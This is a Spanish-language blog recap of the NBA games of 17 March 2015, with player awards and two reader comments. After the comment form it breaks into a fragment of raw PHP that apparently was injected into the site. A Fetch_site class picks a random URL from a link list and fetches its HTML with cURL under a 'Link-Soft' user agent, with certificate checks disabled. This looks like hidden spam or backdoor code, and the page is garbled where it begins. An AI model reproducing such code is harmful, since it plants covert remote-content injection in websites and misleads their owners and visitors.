La Crónica: Pequeños placeres

17 de March de 2015 por MagicJohnson32

En ocasiones uno ha de conformarse con los pequeños placeres que le ofrece la vida. Como, por ejemplo, vencer al equipo capitaneado por el que fuera tu jugador estrella las últimas cuatro temporadas. Otros aspiran a más. Los Warriors, por ejemplo, que certificaron su presencia en los Playoffs pero no se van a conformar con tan poco. Tampoco los Mavericks, que parecen reactivados y anoche mostraron una química que aún no les habíamos detectado.

Fue una jornada extensa, así que mejor nos ponemos a ello.

wadebron

Cleveland Cavaliers 92 – Miami Heat 106

En una temporada que no está resultado nada benévola con los Heat, una jornada como la de anoche sabe especialmente dulce. LeBron y sus Cavs visitaban Miami en su mejor momento, en obvio contraste con los problemas de los Heat para hacerse con una plaza para los Playoffs. Comandados por un Wade imparable, los locales no solo superaron en todos los aspectos a los Cavs, sino que se anotaron una victoria que les permite recuperar la octava posición y alcanzar un triple empate con Pacers (7º) y Boston (9º), con los Hornets décimos a solo medio partido. Para vencer a los Cavaliers, los Heat exhibieron sus mejores armas, y la mejor de ellas es la agresividad hacia el aro de su backcourt titular. Wade y Dragic desarbolaron a Irving y JR, y en la pintura Whiteside volvió a ser el de los días buenos. Enfrente, y en ausencia de Love, al que Blatt volvió a dar descanso, a los Cavs les faltó pólvora (38% en tiros) y LeBron estuvo muy apagado hasta el último cuarto, cuando la desventaja ya había alcanzado los 25 puntos y no había nada que hacer más que maquillar números. Obviamente, los Heat cambiarían la victoria de anoche por volver a tener a LeBron en sus filas, pero a veces uno ha de conformarse con los pequeños placeres que le da la vida.

OKC Thunder 115 – Dallas Mavericks 119

Igualdad hasta la bocina final. Técnicas. Flagrantes. Arbitraje polémico. Y mucho talento sobre el parquet. El Thunder-Mavs tuvo todo el aroma de los Playoffs, pese a que OKC se presentaba sin Durant ni Ibaka, quien habrá de pasar por quirófano y estará de baja un período de tiempo aún indeterminado. En tal contexto, claro está, hubo una dosis altísima de Westbrook, con todo lo que eso conlleva. El base de los Thunder protagonizó un precioso duelo con Rondo y de nuevo acumuló números espectaculares. Sin embargo, sus 7 pérdidas de balón, y particularmente dos faltas en ataque consecutivas que además causaron su eliminación, acabaron por sentenciar a su equipo. Por parte de los Mavs, además de una victoria que aleja cualquier fantasma y les devuelve a la pelea por disponer de ventaja de campo en primera ronda, hay que celebrar que coincidan buenas actuaciones de Rondo, Parsons, Nowitzki y Monta Ellis, algo que apenas hemos visto hasta el momento.

Resto de la jornada

Otro gran duelo de bases se vio en el Raptors-Pacers. Lowry lideró la victoria más convincente de los canadienses en semanas (117-98) pero George Hill mantuvo el excelente nivel que está demostrando últimamente. Pese a ello, los Pacers han frenado su auge y suman dos derrotas seguidas, por lo que se han visto alcanzados por Heat y Celtics. En Boston, poco tenían que rascar los Sixers, que se vieron arrasados en el primer cuarto ante un equipo on fire al completo (sobre todo, Bradley y Zeller). Philly maquilló algo el marcador al final (89-108) pero los Celtics suman ya cinco triunfos seguidos. No es la mejor racha de la liga, honor que corresponde a los Jazz. Anoche demolieron a los Hornets (66-94) en una nueva exhibición defensiva de los pupilos de Quinn Snyder. Con algo más de sufrimiento del debido, los Warriors despacharon a los Lakers (105-108) en un partido que pasará a la historia como el día en que Jeremy Lin taponó a Draymond Green. Los Warriors, de paso, se aseguraron matemáticamente la plaza de Playoffs. También sudaron los líderes del Este, Atlanta Hawks, para vencer a otro equipo californiano netamente inferior, los Kings (110-103), aunque en parte se justifica por el descanso de Budenholzer a Horford y la baja de Korver. Otro equipo que dio descanso a sus mejores jugadores fueron los Nuggets, pero en este caso de manera injustificada, ya que no jugarán Playoffs. Es decir: tanking indisimulado. Sin Faried, Lawson ni Gallinari, los de Denver, que llegaban con una racha de cuatro victorias seguidas, perdieron en pista de los Grizzlies (81-92). También se acabó la racha de los Blazers, que estuvieron cerca de remontar 25 puntos en pista de los Wizards pero acabaron cediendo ante Wall & Beal (97-105). La clara victoria de los Nets en Minnesota (122-106) la archivaremos en la categoría de ‘resultados intranscendentes’.

PREMIOS

MVP: Kyle Lowry fue el mejor de unos Raptors que asaltaron con relativa facilidad Indianapolis. Él y su triple-doble (20-11-10) tuvieron mucha culpa. Por su parte, John Wall se quedó a nada del triple-doble. Los Wizards se impusieron a los Blazers con 21 puntos, 9 rebotes y 11 asistencias del base. Y Dwyane Wade recordó al de las grandes noches en un nuevo reencuentro con LeBron James. Flash se fue a los 32 puntos y 5 robos.

Rookie: Rodney Hood ha entrado definitivamente en la rotación de los Jazz y lo ha hecho para quedarse. Ante los Hornets firmó un 5 de 5 en triples y acabó con 24 puntos, su máximo esta temporada. Bojan Bogdanovic anotó 21 puntos ante los Wolves y Jordan Clarkson fue capaz de bailar con la más fea (Stephen Curry no acabó de sentirse cómodo ante su defensa) y aun así anotar 17 puntos y coger 6 rebotes.

Sorpresa: Los Celtics encadenan 5 victorias consecutivas y se gustan cada vez más. Ayer, Avery Bradley anotó 20 puntos, cogió 10 rebotes y repartió 6 asistencias pero es que Tyler Zeller se fue hasta los 26 puntos, el máximo de su carrera.

Decepción: Dentro del horror general que fueron anoche los Hornets, especialmente malas fueron las actuaciones de Gerald Henderson y Kemba Walker. Entre ambos acumularon 2 de 14 en tiros de campo para 9 puntos y apenas nada en el resto de categorías estadísticas.

Esfuerzo en vano: Russell Westbrook ha tenido que salir al paso de algunas críticas que empezaban a acusarle de “inflanúmeros”. Sea como sea, esta vez su casi triple-doble (24-8-12 y 4 robos) no obtuvo recompensa.

Top 10

Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. Azabel dice:
    #1

    por cuestiones obvias de buen gusto no miro a los Lakers, pero ese Jordan Clarkson es un maquillador de numeros o tiene cualidades enserio?

      Citar

  2. Ruxixón dice:
    #2

    Hablando de gustos,la peor actuación de la temporada en los 63 partidos que han visto estos ojos,lo de esta noche de Charlotte,un poco a la limón a la versión desastre de los Cavaliers de principios de temporada,donde todos iban a su bola.Que esperpento la de los chicos de Clifford,y vaya paso atrás para Jordan y su franquicia,en el año del retorno de las avispas.Podrán meterse en PO,pero varias elementos que fueron fundamentales el año pasado esta temporada missing total.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>